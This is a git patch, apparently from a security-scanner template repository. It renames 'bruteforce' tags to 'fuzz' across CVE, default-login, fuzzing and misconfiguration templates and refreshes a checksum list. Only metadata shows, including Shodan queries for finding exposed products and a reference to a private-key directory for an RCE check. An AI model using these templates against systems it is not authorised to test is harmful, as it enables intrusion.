wordpress - tags: cve,cve2022,wp,disclosure,wpscan,sensei-lms,bruteforce,hackerone,wordpress,wp-plugin,automattic + tags: cve,cve2022,wp,disclosure,wpscan,sensei-lms,fuzz,hackerone,wordpress,wp-plugin,automattic http: - method: GET diff --git a/http/cves/2022/CVE-2022-2599.yaml b/http/cves/2022/CVE-2022-2599.yaml index ce4dd18699..71cb695804 100644 --- a/http/cves/2022/CVE-2022-2599.yaml +++ b/http/cves/2022/CVE-2022-2599.yaml @@ -29,7 +29,7 @@ info: vendor: anti-malware_security_and_brute-force_firewall_project product: anti-malware_security_and_brute-force_firewall framework: wordpress - tags: cve,cve2022,wordpress,wp-plugin,xss,gotmls,authenticated,wpscan,anti-malware_security_and_brute-force_firewall_project + tags: cve,cve2022,wordpress,wp-plugin,xss,gotmls,authenticated,wpscan http: - raw: diff --git a/http/cves/2023/CVE-2023-24489.yaml b/http/cves/2023/CVE-2023-24489.yaml index b2d05cd0a9..84207995d6 100644 --- a/http/cves/2023/CVE-2023-24489.yaml +++ b/http/cves/2023/CVE-2023-24489.yaml @@ -28,7 +28,7 @@ info: vendor: citrix product: sharefile_storage_zones_controller shodan-query: title:"ShareFile Storage Server" - tags: cve2023,cve,sharefile,rce,intrusive,fileupload,bruteforce,kev,citrix + tags: cve2023,cve,sharefile,rce,intrusive,fileupload,fuzz,kev,citrix variables: fileName: '{{rand_base(8)}}' diff --git a/http/default-logins/oracle/peoplesoft-default-login.yaml b/http/default-logins/oracle/peoplesoft-default-login.yaml index ab570a5d23..5efacaf70e 100644 --- a/http/default-logins/oracle/peoplesoft-default-login.yaml +++ b/http/default-logins/oracle/peoplesoft-default-login.yaml @@ -16,7 +16,7 @@ info: verified: true max-request: 200 shodan-query: title:"Oracle PeopleSoft Sign-in" - tags: default-login,peoplesoft,oracle,bruteforce + tags: default-login,peoplesoft,oracle,fuzz http: - method: POST diff --git a/http/exposed-panels/adminer-panel-detect.yaml b/http/exposed-panels/adminer-panel-detect.yaml index 1b29926f7b..8f3282ffe1 100644 --- a/http/exposed-panels/adminer-panel-detect.yaml +++ b/http/exposed-panels/adminer-panel-detect.yaml @@ -19,7 +19,7 @@ info: vendor: adminer product: adminer max-request: 741 - tags: panel,bruteforce,adminer,login,sqli + tags: panel,fuzz,adminer,login,sqli http: - raw: diff --git a/http/exposures/backups/php-backup-files.yaml b/http/exposures/backups/php-backup-files.yaml index 6243db5b26..a6fba70644 100644 --- a/http/exposures/backups/php-backup-files.yaml +++ b/http/exposures/backups/php-backup-files.yaml @@ -7,7 +7,7 @@ info: description: PHP Source File is disclosed to external users. metadata: max-request: 1512 - tags: exposure,backup,php,disclosure,bruteforce + tags: exposure,backup,php,disclosure,fuzz http: - method: GET diff --git a/http/fuzzing/cache-poisoning-fuzz.yaml b/http/fuzzing/cache-poisoning-fuzz.yaml index f76d291382..9e0174b891 100644 --- a/http/fuzzing/cache-poisoning-fuzz.yaml +++ b/http/fuzzing/cache-poisoning-fuzz.yaml @@ -9,7 +9,7 @@ info: - https://portswigger.net/web-security/web-cache-poisoning metadata: max-request: 5834 - tags: fuzzing,bruteforce,cache + tags: fuzz,cache http: - raw: diff --git a/http/fuzzing/header-command-injection.yaml b/http/fuzzing/header-command-injection.yaml index 550e7fbc9a..9863e8e4b0 100644 --- a/http/fuzzing/header-command-injection.yaml +++ b/http/fuzzing/header-command-injection.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-77 metadata: max-request: 7650 - tags: fuzzing,bruteforce,rce + tags: fuzz,rce http: - raw: diff --git a/http/fuzzing/iis-shortname.yaml b/http/fuzzing/iis-shortname.yaml index 6be72001b3..d6da7ac5b6 100644 --- a/http/fuzzing/iis-shortname.yaml +++ b/http/fuzzing/iis-shortname.yaml @@ -15,7 +15,7 @@ info: cwe-id: CWE-200 metadata: max-request: 4 - tags: bruteforce,edb + tags: iis,edb http: - raw: diff --git a/http/fuzzing/linux-lfi-fuzzing.yaml b/http/fuzzing/linux-lfi-fuzzing.yaml index f313bfc151..d21b76eb01 100644 --- a/http/fuzzing/linux-lfi-fuzzing.yaml +++ b/http/fuzzing/linux-lfi-fuzzing.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 22 - tags: fuzzing,linux,lfi,bruteforce + tags: linux,lfi,fuzzing http: - method: GET diff --git a/http/fuzzing/mdb-database-file.yaml b/http/fuzzing/mdb-database-file.yaml index 7c633cd03e..3239da2aee 100644 --- a/http/fuzzing/mdb-database-file.yaml +++ b/http/fuzzing/mdb-database-file.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 341 - tags: bruteforce,mdb,asp + tags: fuzz,mdb,asp http: - raw: diff --git a/http/fuzzing/prestashop-module-fuzz.yaml b/http/fuzzing/prestashop-module-fuzz.yaml index d280c39b77..812dc64365 100644 --- a/http/fuzzing/prestashop-module-fuzz.yaml +++ b/http/fuzzing/prestashop-module-fuzz.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 639 - tags: fuzzing,bruteforce,prestashop + tags: fuzz,prestashop http: - raw: diff --git a/http/fuzzing/ssrf-via-proxy.yaml b/http/fuzzing/ssrf-via-proxy.yaml index 013f9b777d..5959166489 100644 --- a/http/fuzzing/ssrf-via-proxy.yaml +++ b/http/fuzzing/ssrf-via-proxy.yaml @@ -10,7 +10,7 @@ info: - https://twitter.com/ImoJOnDz/status/1649089777629827072 metadata: max-request: 9 - tags: ssrf,proxy,oast,bruteforce + tags: ssrf,proxy,oast,fuzz http: - payloads: diff --git a/http/fuzzing/valid-gmail-check.yaml b/http/fuzzing/valid-gmail-check.yaml index 6d3a9fd0d6..11f2a8e76b 100644 --- a/http/fuzzing/valid-gmail-check.yaml +++ b/http/fuzzing/valid-gmail-check.yaml @@ -8,7 +8,7 @@ info: - https://github.com/dievus/geeMailUserFinder metadata: max-request: 1 - tags: bruteforce,gmail + tags: fuzzing,gmail self-contained: true diff --git a/http/fuzzing/waf-fuzz.yaml b/http/fuzzing/waf-fuzz.yaml index 392aa4cad0..a525a24f89 100644 --- a/http/fuzzing/waf-fuzz.yaml +++ b/http/fuzzing/waf-fuzz.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 58 - tags: fuzzing,waf,tech,bruteforce + tags: waf,tech,fuzz http: - raw: diff --git a/http/fuzzing/wordpress-plugins-detect.yaml b/http/fuzzing/wordpress-plugins-detect.yaml index ac4f0ded77..1b3d0851f9 100644 --- a/http/fuzzing/wordpress-plugins-detect.yaml +++ b/http/fuzzing/wordpress-plugins-detect.yaml @@ -5,8 +5,8 @@ info: author: 0xcrypto severity: info metadata: - max-request: 100563 - tags: fuzzing,bruteforce,wordpress + max-request: 98135 + tags: fuzz,wordpress http: - raw: diff --git a/http/fuzzing/wordpress-themes-detect.yaml b/http/fuzzing/wordpress-themes-detect.yaml index 3bb2f31ff5..c5df4957c4 100644 --- a/http/fuzzing/wordpress-themes-detect.yaml +++ b/http/fuzzing/wordpress-themes-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 24434 - tags: bruteforce,wordpress,wp + tags: fuzz,wordpress http: - raw: diff --git a/http/fuzzing/wordpress-weak-credentials.yaml b/http/fuzzing/wordpress-weak-credentials.yaml index 55bff6004d..f2f4adfe9d 100644 --- a/http/fuzzing/wordpress-weak-credentials.yaml +++ b/http/fuzzing/wordpress-weak-credentials.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-1391 metadata: max-request: 276 - tags: wordpress,default-login,bruteforce + tags: wordpress,default-login,fuzz http: - raw: diff --git a/http/fuzzing/xff-403-bypass.yaml b/http/fuzzing/xff-403-bypass.yaml index 564e32ff7e..868adda120 100644 --- a/http/fuzzing/xff-403-bypass.yaml +++ b/http/fuzzing/xff-403-bypass.yaml @@ -7,7 +7,7 @@ info: description: Template to detect 403 forbidden endpoint bypass behind Nginx/Apache proxy & load balancers, based on X-Forwarded-For header. metadata: max-request: 3 - tags: fuzzing,bruteforce + tags: fuzzing http: - raw: diff --git a/http/miscellaneous/defacement-detect.yaml b/http/miscellaneous/defacement-detect.yaml index 3e6a8b0352..e3151f3d8f 100644 --- a/http/miscellaneous/defacement-detect.yaml +++ b/http/miscellaneous/defacement-detect.yaml @@ -16,7 +16,7 @@ info: metadata: verified: true max-request: 85 - tags: misc,defacement,spam,hacktivism,bruteforce + tags: misc,defacement,spam,hacktivism,fuzz http: - method: GET diff --git a/http/miscellaneous/ntlm-directories.yaml b/http/miscellaneous/ntlm-directories.yaml index 33d464a191..babfb2e205 100644 --- a/http/miscellaneous/ntlm-directories.yaml +++ b/http/miscellaneous/ntlm-directories.yaml @@ -8,7 +8,7 @@ info: - https://medium.com/swlh/internal-information-disclosure-using-hidden-ntlm-authentication-18de17675666 metadata: max-request: 47 - tags: miscellaneous,misc,bruteforce,windows + tags: miscellaneous,misc,fuzz,windows http: - raw: diff --git a/http/misconfiguration/aem/aem-userinfo-servlet.yaml b/http/misconfiguration/aem/aem-userinfo-servlet.yaml index a9f4c34b1f..8fb9cd75de 100644 --- a/http/misconfiguration/aem/aem-userinfo-servlet.yaml +++ b/http/misconfiguration/aem/aem-userinfo-servlet.yaml @@ -8,7 +8,7 @@ info: metadata: max-request: 1 shodan-query: http.component:"Adobe Experience Manager" - tags: aem,bruteforce,misconfig + tags: aem,misconfig http: - method: GET diff --git a/http/misconfiguration/gitlab/gitlab-user-enum.yaml b/http/misconfiguration/gitlab/gitlab-user-enum.yaml index d4a246907a..32032a9d63 100644 --- a/http/misconfiguration/gitlab/gitlab-user-enum.yaml +++ b/http/misconfiguration/gitlab/gitlab-user-enum.yaml @@ -9,7 +9,7 @@ info: metadata: max-request: 100 shodan-query: http.title:"GitLab" - tags: gitlab,enum,misconfig,bruteforce + tags: gitlab,enum,misconfig,fuzz http: - raw: diff --git a/http/misconfiguration/proxy/open-proxy-internal.yaml b/http/misconfiguration/proxy/open-proxy-internal.yaml index 4f55147edc..2c2ffb316d 100644 --- a/http/misconfiguration/proxy/open-proxy-internal.yaml +++ b/http/misconfiguration/proxy/open-proxy-internal.yaml @@ -16,7 +16,7 @@ info: cwe-id: CWE-441 metadata: max-request: 25 - tags: exposure,config,proxy,misconfig,bruteforce + tags: exposure,config,proxy,misconfig,fuzz http: - raw: diff --git a/http/misconfiguration/proxy/open-proxy-localhost.yaml b/http/misconfiguration/proxy/open-proxy-localhost.yaml index 4bbd6ea3f8..05e927aeb7 100644 --- a/http/misconfiguration/proxy/open-proxy-localhost.yaml +++ b/http/misconfiguration/proxy/open-proxy-localhost.yaml @@ -16,7 +16,7 @@ info: cwe-id: CWE-441 metadata: max-request: 6 - tags: exposure,config,proxy,misconfig,bruteforce + tags: exposure,config,proxy,misconfig,fuzz http: - raw: diff --git a/http/misconfiguration/proxy/open-proxy-portscan.yaml b/http/misconfiguration/proxy/open-proxy-portscan.yaml index f9e8c625c5..e59ad881a8 100644 --- a/http/misconfiguration/proxy/open-proxy-portscan.yaml +++ b/http/misconfiguration/proxy/open-proxy-portscan.yaml @@ -16,7 +16,7 @@ info: cwe-id: CWE-441 metadata: max-request: 8 - tags: exposure,config,proxy,misconfig,bruteforce + tags: exposure,config,proxy,misconfig,fuzz http: - raw: diff --git a/http/technologies/graylog/graylog-api-exposure.yaml b/http/technologies/graylog/graylog-api-exposure.yaml index ef9301e3a1..1ff34721ff 100644 --- a/http/technologies/graylog/graylog-api-exposure.yaml +++ b/http/technologies/graylog/graylog-api-exposure.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 50 shodan-query: Graylog - tags: tech,graylog,api,swagger,bruteforce + tags: tech,graylog,api,swagger,fuzz http: - method: GET diff --git a/http/vulnerabilities/tongda/tongda-auth-bypass.yaml b/http/vulnerabilities/tongda/tongda-auth-bypass.yaml index 2366e35ff2..e161a36a79 100644 --- a/http/vulnerabilities/tongda/tongda-auth-bypass.yaml +++ b/http/vulnerabilities/tongda/tongda-auth-bypass.yaml @@ -14,7 +14,7 @@ info: shodan-query: title:"通达OA" fofa-query: title="通达OA" zoomeye-query: app:"通达OA" - tags: tongda,auth-bypass,bruteforce + tags: tongda,auth-bypass,fuzz http: - raw: diff --git a/http/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml b/http/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml index 4f2ba6473d..8aaa5f0c80 100644 --- a/http/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml +++ b/http/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml @@ -10,7 +10,7 @@ info: - https://www.acunetix.com/vulnerabilities/web/wordpress-xml-rpc-authentication-brute-force/ metadata: max-request: 276 - tags: wordpress,php,xmlrpc,bruteforce + tags: wordpress,php,xmlrpc,fuzz http: - raw: diff --git a/javascript/cves/2023/CVE-2023-34039.yaml b/javascript/cves/2023/CVE-2023-34039.yaml index f71d6ad270..cd606aeb7f 100644 --- a/javascript/cves/2023/CVE-2023-34039.yaml +++ b/javascript/cves/2023/CVE-2023-34039.yaml @@ -29,7 +29,8 @@ info: verified: true vendor: vmware product: aria_operations_for_networks - tags: js,packetstorm,cve,cve2019,vmware,aria,rce,bruteforce,vrealize + tags: js,packetstorm,cve,cve2019,vmware,aria,rce,fuzz,vrealize + variables: keysDir: "helpers/payloads/cve-2023-34039-keys" # load all private keys from this directory diff --git a/javascript/default-logins/ssh-default-logins.yaml b/javascript/default-logins/ssh-default-logins.yaml index c048e1bbf5..d3dcf075dd 100644 --- a/javascript/default-logins/ssh-default-logins.yaml +++ b/javascript/default-logins/ssh-default-logins.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 223 shodan-query: port:1433 - tags: js,ssh,default-login,network,bruteforce + tags: js,ssh,default-login,network,fuzz javascript: - pre-condition: | diff --git a/network/misconfig/mysql-native-password.yaml b/network/misconfig/mysql-native-password.yaml index 0c2b16762b..2ade9b58cc 100644 --- a/network/misconfig/mysql-native-password.yaml +++ b/network/misconfig/mysql-native-password.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: network,mysql,bruteforce,db,misconfig + tags: network,mysql,db,misconfig tcp: - host: diff --git a/network/misconfig/tidb-native-password.yaml b/network/misconfig/tidb-native-password.yaml index 94c0f0b903..684baa5174 100644 --- a/network/misconfig/tidb-native-password.yaml +++ b/network/misconfig/tidb-native-password.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: network,tidb,bruteforce,db,misconfig + tags: network,tidb,db,misconfig tcp: - host: From c7359837ab2e45f819c57d8aba0a46fc68960595 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 19 Mar 2024 16:39:00 +0000 Subject: [PATCH 15/86] Auto Generated Templates Checksum [Tue Mar 19 16:39:00 UTC 2024] :robot: --- templates-checksum.txt | 82 +++++++++++++++++++++--------------------- 1 file changed, 41 insertions(+), 41 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 916ac8838a..7516f9bdb0 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -10,7 +10,7 @@ TOP-10.md:06a54531fef2bfc5ec2fa38485a3e30c247a3132 cloud/enum/aws-app-enum.yaml:26d0dcf57c7ba8003940ed1d53a62971564b2018 cloud/enum/aws-s3-bucket-enum.yaml:0d101b898bbaebceea4020963d11829f8167029f cloud/enum/azure-db-enum.yaml:3d29a3c86288356d862922ef0527de99187bf734 -cloud/enum/azure-vm-cloud-enum.yaml:d40729aac7a1bfc55ceaf617c16a08c78fe9600f +cloud/enum/azure-vm-cloud-enum.yaml:69ca5c626f0061e4c9bcc922bf9e05f078459bd2 cloud/enum/azure-website-enum.yaml:037397591c799d32eb8abc94a346ff0805d68204 cloud/enum/gcp-app-engine-enum.yaml:b22ff0601a3f7f6ddc39e39ab9dc34410d213e41 cloud/enum/gcp-bucket-enum.yaml:896300c26517adf67feb80304f5edb25590a03c4 @@ -97,13 +97,13 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 config/README.md:48976bdcd95e99dbc8d6d2a9004df27e0bfa8494 -config/bugbounty.yml:d45915281bcb027c5aac65ec0f66fda4c914bd12 +config/bugbounty.yml:05aaced1241dba5b3c3b37559269b1cae473f52f config/cloud.yml:454e596d8ca3f19213b148f6c54c20806cb87a8e config/compliance.yml:367b57e7e900f92bc8d9e5883e635e975da0cae9 config/osint.yml:683fe1e52716d054760d707dbc123f5e09de5418 -config/pentest.yml:c7b04a39e2efaf1a5f627da9b49ecf714d927f0e +config/pentest.yml:e3a9ebe543e9c2d046ead1efc292394b54a55196 config/privilege-escalation.yml:325607b721fcea55111f8698b10951fd2f0d17b8 -config/recommended.yml:eb4d0cb29634218f0279692e8c59fa1906d7148c +config/recommended.yml:adcd4e1f0ef7b6b8c57fddbdda3ebf2314a8fa9b contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 cves.json:51d8ac58d8ffdf6cfd4660d3e19373bb08bb6605 cves.json-checksum.txt:fdca644f563bcfe217c57881fc5991db50a942e4 @@ -1199,7 +1199,7 @@ http/cves/2017/CVE-2017-16894.yaml:0c7f7d0bdb16cdff6e7a380ba56208eb1ca9d6e6 http/cves/2017/CVE-2017-17043.yaml:b45105c0de0d90d61a79191de73976e9cd4fb790 http/cves/2017/CVE-2017-17059.yaml:d40f8c2b908798457c9b02fa98a480b8bc0a7215 http/cves/2017/CVE-2017-17451.yaml:04b0b3fec8b256c76cef8ea892836c2e420878b8 -http/cves/2017/CVE-2017-17562.yaml:d3e0e64e607cfaaace054ae2b40fd4b792f19b92 +http/cves/2017/CVE-2017-17562.yaml:f73fd69cc36d28c4be6a6747c45f942f857029ef http/cves/2017/CVE-2017-17731.yaml:1666574cd4dfc7a3995867c7c4b621b267b885ff http/cves/2017/CVE-2017-17736.yaml:877434782e6a2c5b3095498877a022c3551b6ca8 http/cves/2017/CVE-2017-18024.yaml:6b154b9615599e11764e703081eca6329935ee5e @@ -1496,7 +1496,7 @@ http/cves/2019/CVE-2019-16932.yaml:182fef4932dc7931c45cd3d7aebdaeef9ded81e8 http/cves/2019/CVE-2019-16996.yaml:ad524a9c60b54d610e8c55acaa46e4958a9b8dce http/cves/2019/CVE-2019-16997.yaml:e103b4c103866170ecfaef2fcf0e2cf88609b940 http/cves/2019/CVE-2019-17270.yaml:8f282f5849f13dda11bbb8837079bb223d9687fb -http/cves/2019/CVE-2019-17382.yaml:8b758f47cbcdde1a0409b679b261ccf5fcbd7d50 +http/cves/2019/CVE-2019-17382.yaml:2a14f06044507c830b2d10f4a86315439d64f88f http/cves/2019/CVE-2019-17418.yaml:dbeea758a5b8de4c18d2d8790798711113d69195 http/cves/2019/CVE-2019-17444.yaml:7b94376c34d962236141cba63543376257005654 http/cves/2019/CVE-2019-17503.yaml:6701aacab1ee79d24acd3cbd1497fb50399ad671 @@ -2398,7 +2398,7 @@ http/cves/2022/CVE-2022-1933.yaml:97c269db3367ffd56494243b090e307b4eb0b586 http/cves/2022/CVE-2022-1937.yaml:f888a42c920fb30ae5b563bf642af334cd97da95 http/cves/2022/CVE-2022-1946.yaml:982f4f9519b1a137a8d2f2c71c7f2225cb67da1d http/cves/2022/CVE-2022-1952.yaml:4c4d64ceb64295942d0d9c2c1ae79a9bc6a16ee7 -http/cves/2022/CVE-2022-2034.yaml:a56290dfd329c3ac92bf63ca31f9a8ccfafd7386 +http/cves/2022/CVE-2022-2034.yaml:db07244959fe5aec265a0b9f1e8b398a93a6076c http/cves/2022/CVE-2022-21371.yaml:e9b20049b90afecb519db58387e5922047ef5944 http/cves/2022/CVE-2022-21500.yaml:7a87435ea2a54ac9c454a344a87fd21e51758b36 http/cves/2022/CVE-2022-21587.yaml:9e40fc00a04665d81ac142e197d40f1926a521c6 @@ -2480,7 +2480,7 @@ http/cves/2022/CVE-2022-25489.yaml:5c5c7a7388f9e133b0cf380bad27eeaebb0c2a74 http/cves/2022/CVE-2022-25497.yaml:07424dc06af0ea2d10c5aa1a201ce4d0f2d26848 http/cves/2022/CVE-2022-2551.yaml:a2dc5d4686710a2e9aeea1bdadf8f7fac2f3766f http/cves/2022/CVE-2022-25568.yaml:aabffcf5827e7ee05211b2651ca350e913371665 -http/cves/2022/CVE-2022-2599.yaml:3acebe0eef8eedb44906ac2579e6d0f0024a48d3 +http/cves/2022/CVE-2022-2599.yaml:51779e43ad99b49a367ddd03a76fc22508c0c15c http/cves/2022/CVE-2022-26134.yaml:788a7f51e1550cc5770aab979234ac35b54d2505 http/cves/2022/CVE-2022-26138.yaml:15d0534ab6765d2e536070eda15d020e04f43abc http/cves/2022/CVE-2022-26148.yaml:f37f9182974b9dd8d49af32a7ef9841fe7d704ae @@ -2819,7 +2819,7 @@ http/cves/2023/CVE-2023-24278.yaml:e397c7d647c7517b78e44dbc79c8fcbc80480623 http/cves/2023/CVE-2023-24322.yaml:c4b5cc0d4d70fa16682f706a954b95c84e0e7896 http/cves/2023/CVE-2023-24367.yaml:dab63258fffca6b44d754ede551d56eea925a477 http/cves/2023/CVE-2023-24488.yaml:8a381e70fd0643ed5d1371edb70b40e25e9b5ff8 -http/cves/2023/CVE-2023-24489.yaml:c8aa249866735b4ad90a721d721d9e9426628ad8 +http/cves/2023/CVE-2023-24489.yaml:ffcbd0678ae55a267244d0a62703c1756b701aae http/cves/2023/CVE-2023-24657.yaml:1efdbfecef2aacf600fb007989d4efc6aa9d7fbe http/cves/2023/CVE-2023-24733.yaml:f1b740ac9ba1fc859deb3c69798e1bc3d302ed4e http/cves/2023/CVE-2023-24735.yaml:e38322978b1598d32056adb11572c6c401107c40 @@ -3055,7 +3055,7 @@ http/cves/2023/CVE-2023-5244.yaml:32f7df605dda4c16610c548f773673f5b69c67a5 http/cves/2023/CVE-2023-5360.yaml:387bf52196ed2e1d383a97ea158fe90b94d213b9 http/cves/2023/CVE-2023-5375.yaml:394c4b2b0867a8922fcfad500616380c117983d8 http/cves/2023/CVE-2023-5556.yaml:7d50d6e2861161f90b7876147d3405d5c7eeccf4 -http/cves/2023/CVE-2023-5830.yaml:85965a9925a1cd03639181416b2c20995b33f501 +http/cves/2023/CVE-2023-5830.yaml:76c2cd53d3eb9187c00e98e057fa4cdd29412e6a http/cves/2023/CVE-2023-5914.yaml:93f627b753ac975d5a74a2532a42aa9449682207 http/cves/2023/CVE-2023-6018.yaml:e840e467eab7d472ae719996be481de06fafb2cf http/cves/2023/CVE-2023-6020.yaml:68c05fb386a060d81834e2ddbaefb5779ae81b51 @@ -3206,7 +3206,7 @@ http/default-logins/ofbiz/ofbiz-default-login.yaml:2e6eea7863853fca0a5546a479d43 http/default-logins/openemr/openemr-default-login.yaml:e47d165fc7a306238827e4ea1497307f932890cd http/default-logins/openmediavault/openmediavault-default-login.yaml:efb418987e7a7b80b6fc9ea78f883b4dcaa90efe http/default-logins/oracle/businessintelligence-default-login.yaml:29309871b052bb3f05de613e838dadb92dd47f79 -http/default-logins/oracle/peoplesoft-default-login.yaml:6ee288c848a0c5a046e206b7f245a50f886e72d6 +http/default-logins/oracle/peoplesoft-default-login.yaml:5da182e00f57e6927f30674cde5f7bae9de6bbd4 http/default-logins/others/aruba-instant-default-login.yaml:398f77a4e4e01153465c51bdfeb3cf53f670a85b http/default-logins/others/ciphertrust-default-login.yaml:9d29315f7fd68f1e4f55dd046bf7c716658ef13e http/default-logins/others/cnzxsoft-default-login.yaml:71898b0928c2f380612addb0350fb686dd84e025 @@ -3292,7 +3292,7 @@ http/exposed-panels/acunetix-panel.yaml:b10cd9d4a29dea26e161ddeb85b6b920efd69870 http/exposed-panels/addonfinance-portal.yaml:38506f2dd6a3a69108a50fe67a2686af99398590 http/exposed-panels/adhoc-transfer-panel.yaml:dcce7565c43f4ea78e2a3ad9fc8216f301f05c94 http/exposed-panels/adiscon-loganalyzer.yaml:fc2432f93a3fd7724c3f0d2814d41c065e0b8b21 -http/exposed-panels/adminer-panel-detect.yaml:e1426681f4d6c9e2502bc10a2327e73b6fa9113e +http/exposed-panels/adminer-panel-detect.yaml:89f3dfcb1a75493cc7d806df52ee64b3e65450fa http/exposed-panels/adminer-panel.yaml:b266fbab664e4ee130429e725409cf78000739e0 http/exposed-panels/adminset-panel.yaml:2be3fbb1ec0fe028405fdb0353163d1352a14d65 http/exposed-panels/adobe/adobe-component-login.yaml:ca846d96566ad14a055b85c15bd2b61e3a786d8d @@ -4340,7 +4340,7 @@ http/exposures/apis/wadl-api.yaml:7a728eb7a4cb779218d582661a7fb2978abedc03 http/exposures/apis/wsdl-api.yaml:e28378d37cb724e50ad74e13158210a704a2d9df http/exposures/backups/exposed-mysql-initial.yaml:546b26c48697aa27b99c9d385c509b1af10e8907 http/exposures/backups/froxlor-database-backup.yaml:a8296d723d545dea6b9d898766db58cc8f06c984 -http/exposures/backups/php-backup-files.yaml:6af27377a944a299aee9bf4c4dbd8b60b99b8224 +http/exposures/backups/php-backup-files.yaml:505b1da333d78f3266443cab2fa4f9a6e57d6635 http/exposures/backups/settings-php-files.yaml:4deb7ac78c1f7df72c6efad11c7ce77373c3ba7b http/exposures/backups/sql-dump.yaml:e989e8b4ad56b0ed996c7dc9cec7eab2210c223c http/exposures/backups/zip-backup-files.yaml:0b4309555d6a4f0fee56b49d302d209baccb808e @@ -4822,19 +4822,19 @@ http/exposures/tokens/zendesk/zendesk-key.yaml:002e66de48b921b1485a90c9ee0b8202d http/exposures/tokens/zenserp/zenscrape-api-key.yaml:a8b850b2efaae638efc02b5d207fe6bc855610e9 http/exposures/tokens/zenserp/zenserp-api-key.yaml:dc1d18779abf2831c2b624b8cebad22f57bad735 http/exposures/tokens/zoho/zoho-webhook-token.yaml:213408cbf1610741f4f31da89e8dba8f3d5b20eb -http/fuzzing/cache-poisoning-fuzz.yaml:0dea0da9f14667463434dd2938455cb041e9de7a -http/fuzzing/header-command-injection.yaml:f35e69a5b540b432355364ce314be23d0dfe72de -http/fuzzing/iis-shortname.yaml:878ffbd680260e7de82515ae139572b9d076ba40 -http/fuzzing/linux-lfi-fuzzing.yaml:6d09bdb021b1d2f04197a1afcb5566f94c345578 -http/fuzzing/mdb-database-file.yaml:44368401b80d528a53411419188d8654cc01092a -http/fuzzing/prestashop-module-fuzz.yaml:1770351eb8024ad210d1773b851f15a92f523bf6 -http/fuzzing/ssrf-via-proxy.yaml:67a0e37236d363d42d148494ee00f3fb55372ce3 -http/fuzzing/valid-gmail-check.yaml:5322234e7caccea4fe57c3ec8ea7e5b6b91317e6 -http/fuzzing/waf-fuzz.yaml:6b9237448f006d60291634510ac4d910fb73ca0c -http/fuzzing/wordpress-plugins-detect.yaml:3bb133a2a5af6333133a4d1afc69b7253325e071 -http/fuzzing/wordpress-themes-detect.yaml:81452a0c2201364547a722b3268c3cc9be19fbad -http/fuzzing/wordpress-weak-credentials.yaml:3688f4121a6862a3ec2177a0c28c6f0aaea1cfe8 -http/fuzzing/xff-403-bypass.yaml:3988407398c98a0f521e0251aafe2738470ed895 +http/fuzzing/cache-poisoning-fuzz.yaml:55b0174b93ae85bcd2a5bd8dae8d5f2ee6dc183c +http/fuzzing/header-command-injection.yaml:531a6bae6185a29c431f42e8f2d0e4931ec82d05 +http/fuzzing/iis-shortname.yaml:3b02c03dfa0000145db4e569e9894ae9f9bfe4e0 +http/fuzzing/linux-lfi-fuzzing.yaml:98fb1f938fadd7dbef664b4fb90f70340998090d +http/fuzzing/mdb-database-file.yaml:f10257c4e4200709619934b82ad68db7c8ddf918 +http/fuzzing/prestashop-module-fuzz.yaml:7dad3e5599c90ca0dd227bebde42d56d3dc4fe8d +http/fuzzing/ssrf-via-proxy.yaml:61406c0b18b887b8b0820c01ccb006f25a8febf2 +http/fuzzing/valid-gmail-check.yaml:a9ddd0375c3160a61a5f2387c1113b9b64df8879 +http/fuzzing/waf-fuzz.yaml:d748d662ef552cee252b45d68017a09286c6eb93 +http/fuzzing/wordpress-plugins-detect.yaml:6a6a62082132ee13694282e8b77818db20ae5e64 +http/fuzzing/wordpress-themes-detect.yaml:bac6070c72b0db61adc5945ec1b14326c766cd14 +http/fuzzing/wordpress-weak-credentials.yaml:31dff20ca524cae856476baac860a09fd9a536ed +http/fuzzing/xff-403-bypass.yaml:debf58b69daf4676a60aba8af99fd6dc99df1d7d http/honeypot/citrix-honeypot-detect.yaml:a632cb08a12e2d3dfe69f8b4e8d0cbd4d44cbbc5 http/honeypot/dionaea-http-honeypot-detect.yaml:7830d2af83e16b50c0a4b647defe89c9ac5efe25 http/honeypot/elasticpot-honeypot-detect.yaml:73cb47452335d2c4e95f07bdbaabcb7800b634aa @@ -4895,7 +4895,7 @@ http/miscellaneous/balada-injector-malware.yaml:46e26d3735f737c251df9a46d7091f3d http/miscellaneous/clientaccesspolicy.yaml:f1ce4622fb979da2754ffba7bf52cdfe3fc470d0 http/miscellaneous/crypto-mining-malware.yaml:10c82a94c2cf226eb22b8ac8e10dc88d8aa24387 http/miscellaneous/defaced-website-detect.yaml:045ede38b93611039e21dc0f249ddebf3a5499e5 -http/miscellaneous/defacement-detect.yaml:b1ec2272ff1ecfdfa21cf8bec5620e26d325817e +http/miscellaneous/defacement-detect.yaml:4bb02fec3ec11dcb407a956be1fc2f0a6bcc9897 http/miscellaneous/detect-dns-over-https.yaml:46b316a9632c17d9cf75cbb27de9c706c9a14b0b http/miscellaneous/dir-listing.yaml:dad3bf5aa871745ab62bf6f4b61909bde637e326 